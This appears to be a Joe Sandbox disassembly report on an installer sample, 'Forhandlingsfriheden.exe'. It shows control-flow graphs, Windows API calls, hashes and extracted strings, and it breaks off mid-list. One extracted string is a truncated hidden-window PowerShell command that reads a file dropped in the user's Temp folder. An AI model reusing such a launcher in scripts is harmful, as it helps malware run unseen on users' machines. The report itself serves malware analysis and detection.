294->220 295 404368-40436c 294->295 296 40438b-40439f DestroyWindow 295->296 297 40436e-404374 295->297 296->232 299 4043a5-4043d2 CreateDialogParamW 296->299 297->219 298 40437a-404380 297->298 298->220 300 404386 298->300 299->232 301 4043d8-40442f call 4044c0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 299->301 300->219 301->219 306 404431-404444 ShowWindow call 40450c 301->306 308 404449 306->308 308->232
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                                            • ShowWindow.USER32(?), ref: 0040401D
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                                            • ShowWindow.USER32(?,00000004), ref: 00404048
                                                                            • DestroyWindow.USER32 ref: 0040405C
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                                            • GetDlgItem.USER32(?,?), ref: 00404094
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                                            • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                                            • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                                            • ShowWindow.USER32(00000000,?), ref: 00404296
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                                                            • EnableWindow.USER32(?,?), ref: 004042C3
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                                                            • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                                            • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                                            • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID:
                                                                            • API String ID: 121052019-0
                                                                            • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                            • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                                            • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                            • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 309 403c13-403c2b call 406935 312 403c2d-403c3d call 406488 309->312 313 403c3f-403c76 call 40640f 309->313 322 403c99-403cc2 call 403ee9 call 405f18 312->322 318 403c78-403c89 call 40640f 313->318 319 403c8e-403c94 lstrcatW 313->319 318->319 319->322 327 403d54-403d5c call 405f18 322->327 328 403cc8-403ccd 322->328 334 403d6a-403d8f LoadImageW 327->334 335 403d5e-403d65 call 40657e 327->335 328->327 329 403cd3-403cfb call 40640f 328->329 329->327 336 403cfd-403d01 329->336 338 403e10-403e18 call 40140b 334->338 339 403d91-403dc1 RegisterClassW 334->339 335->334 340 403d13-403d1f lstrlenW 336->340 341 403d03-403d10 call 405e3d 336->341 350 403e22-403e2d call 403ee9 338->350 351 403e1a-403e1d 338->351 342 403dc7-403e0b SystemParametersInfoW CreateWindowExW 339->342 343 403edf 339->343 348 403d21-403d2f lstrcmpiW 340->348 349 403d47-403d4f call 405e10 call 406541 340->349 341->340 342->338 347 403ee1-403ee8 343->347 348->349 354 403d31-403d3b GetFileAttributesW 348->354 349->327 362 403e33-403e4d ShowWindow call 4068c5 350->362 363 403eb6-403eb7 call 405699 350->363 351->347 357 403d41-403d42 call 405e5c 354->357 358 403d3d-403d3f 354->358 357->349 358->349 358->357 370 403e59-403e6b GetClassInfoW 362->370 371 403e4f-403e54 call 4068c5 362->371 366 403ebc-403ebe 363->366 368 403ec0-403ec6 366->368 369 403ed8-403eda call 40140b 366->369 368->351 372 403ecc-403ed3 call 40140b 368->372 369->343 375 403e83-403ea6 DialogBoxParamW call 40140b 370->375 376 403e6d-403e7d GetClassInfoW RegisterClassW 370->376 371->370 372->351 380 403eab-403eb4 call 403b63 375->380 376->375 380->347
                                                                            APIs
                                                                              • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                              • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                            • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Forhandlingsfriheden.exe",00008001), ref: 00403C94
                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,76233420), ref: 00403D14
                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes), ref: 00403D7B
                                                                              • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                            • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                                            • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                                            • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\Forhandlingsfriheden.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                            • API String ID: 1975747703-2188187077
                                                                            • Opcode ID: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                            • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                                            • Opcode Fuzzy Hash: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                            • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406031 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406541 call 405e5c call 406541 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 397 403135-40314c 395->397 402 403225-403228 396->402 403 403278-40327d 396->403 399 403150-403159 call 4034be 397->399 400 40314e 397->400 409 40327f-403287 call 40303e 399->409 410 40315f-403166 399->410 400->399 405 40322a-403242 call 4034d4 call 4034be 402->405 406 40324c-403276 GlobalAlloc call 4034d4 call 4032d9 402->406 403->388 405->403 429 403244-40324a 405->429 406->403 434 403289-40329a 406->434 409->403 413 4031e2-4031e6 410->413 414 403168-40317c call 405fec 410->414 418 4031f0-4031f6 413->418 419 4031e8-4031ef call 40303e 413->419 414->418 432 40317e-403185 414->432 425 403205-40320d 418->425 426 4031f8-403202 call 406a22 418->426 419->418 425->397 433 403213 425->433 426->425 429->403 429->406 432->418 438 403187-40318e 432->438 433->396 435 4032a2-4032a7 434->435 436 40329c 434->436 439 4032a8-4032ae 435->439 436->435 438->418 440 403190-403197 438->440 439->439 441 4032b0-4032cb SetFilePointer call 405fec 439->441 440->418 442 403199-4031a0 440->442 445 4032d0 441->445 442->418 444 4031a2-4031c2 442->444 444->403 446 4031c8-4031cc 444->446 445->388 447 4031d4-4031dc 446->447 448 4031ce-4031d2 446->448 447->418 449 4031de-4031e0 447->449 448->433 448->447 449->418
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004030B3
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                                                              • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                              • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                                            Strings
                                                                            • Error launching installer, xrefs: 004030F2
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004030A9
                                                                            • soft, xrefs: 00403190
                                                                            • "C:\Users\user\Desktop\Forhandlingsfriheden.exe", xrefs: 004030A8
                                                                            • Null, xrefs: 00403199
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                                            • C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
                                                                            • Inst, xrefs: 00403187
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: "C:\Users\user\Desktop\Forhandlingsfriheden.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 2803837635-3778173753
                                                                            • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                            • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                                                            • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                            • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 450 40657e-406587 451 406589-406598 450->451 452 40659a-4065b4 450->452 451->452 453 4067c4-4067ca 452->453 454 4065ba-4065c6 452->454 456 4067d0-4067dd 453->456 457 4065d8-4065e5 453->457 454->453 455 4065cc-4065d3 454->455 455->453 459 4067e9-4067ec 456->459 460 4067df-4067e4 call 406541 456->460 457->456 458 4065eb-4065f4 457->458 461 4067b1 458->461 462 4065fa-40663d 458->462 460->459 464 4067b3-4067bd 461->464 465 4067bf-4067c2 461->465 466 406643-40664f 462->466 467 406755-406759 462->467 464->453 465->453 468 406651 466->468 469 406659-40665b 466->469 470 40675b-406762 467->470 471 40678d-406791 467->471 468->469 474 406695-406698 469->474 475 40665d-406683 call 40640f 469->475 472 406772-40677e call 406541 470->472 473 406764-406770 call 406488 470->473 476 4067a1-4067af lstrlenW 471->476 477 406793-40679c call 40657e 471->477 488 406783-406789 472->488 473->488 481 40669a-4066a6 GetSystemDirectoryW 474->481 482 4066ab-4066ae 474->482 491 406689-406690 call 40657e 475->491 492 40673d-406740 475->492 476->453 477->476 489 406738-40673b 481->489 484 4066c0-4066c4 482->484 485 4066b0-4066bc GetWindowsDirectoryW 482->485 484->489 490 4066c6-4066e4 484->490 485->484 488->476 493 40678b 488->493 489->492 494 40674d-406753 call 4067ef 489->494 497 4066e6-4066ec 490->497 498 4066f8-406710 call 406935 490->498 491->489 492->494 495 406742-406748 lstrcatW 492->495 493->494 494->476 495->494 503 4066f4-4066f6 497->503 507 406712-406725 SHGetPathFromIDListW CoTaskMemFree 498->507 508 406727-406730 498->508 503->498 505 406732-406736 503->505 505->489 507->505 507->508 508->490 508->505
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
                                                                            • lstrlenW.KERNEL32(: Completed,00000000,daniglacial,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                            • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$daniglacial$powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bi
                                                                            • API String ID: 4024019347-1038213914
                                                                            • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                            • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                                                            • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                            • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 509 401794-4017b9 call 402dcb call 405e87 514 4017c3-4017d5 call 406541 call 405e10 lstrcatW 509->514 515 4017bb-4017c1 call 406541 509->515 520 4017da-4017db call 4067ef 514->520 515->520 524 4017e0-4017e4 520->524 525 4017e6-4017f0 call 40689e 524->525 526 401817-40181a 524->526 533 401802-401814 525->533 534 4017f2-401800 CompareFileTime 525->534 528 401822-40183e call 406031 526->528 529 40181c-40181d call 40600c 526->529 536 401840-401843 528->536 537 4018b2-4018db call 4055c6 call 4032d9 528->537 529->528 533->526 534->533 538 401894-40189e call 4055c6 536->538 539 401845-401883 call 406541 * 2 call 40657e call 406541 call 405ba1 536->539 549 4018e3-4018ef SetFileTime 537->549 550 4018dd-4018e1 537->550 551 4018a7-4018ad 538->551 539->524 571 401889-40188a 539->571 554 4018f5-401900 CloseHandle 549->554 550->549 550->554 555 402c58 551->555 557 401906-401909 554->557 558 402c4f-402c52 554->558 559 402c5a-402c5e 555->559 561 40190b-40191c call 40657e lstrcatW 557->561 562 40191e-401921 call 40657e 557->562 558->555 568 401926-4023c7 call 405ba1 561->568 562->568 568->559 575 402953-40295a 568->575 571->551 573 40188c-40188d 571->573 573->538 575->558
                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bidragspligtige132,?,?,00000031), ref: 004017D5
                                                                            • CompareFileTime.KERNEL32(-00000014,?,32079,32079,00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bidragspligtige132,?,?,00000031), ref: 004017FA
                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                              • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                              • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: 32079$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bidragspligtige132$hadefuldeste\optjeningers\hottish
                                                                            • API String ID: 1941528284-1028382817
                                                                            • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                            • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                                                            • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                            • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 576 4055c6-4055db 577 4055e1-4055f2 576->577 578 405692-405696 576->578 579 4055f4-4055f8 call 40657e 577->579 580 4055fd-405609 lstrlenW 577->580 579->580 582 405626-40562a 580->582 583 40560b-40561b lstrlenW 580->583 585 405639-40563d 582->585 586 40562c-405633 SetWindowTextW 582->586 583->578 584 40561d-405621 lstrcatW 583->584 584->582 587 405683-405685 585->587 588 40563f-405681 SendMessageW * 3 585->588 586->585 587->578 589 405687-40568a 587->589 588->587 589->578
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                            • lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                            • lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                            • SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
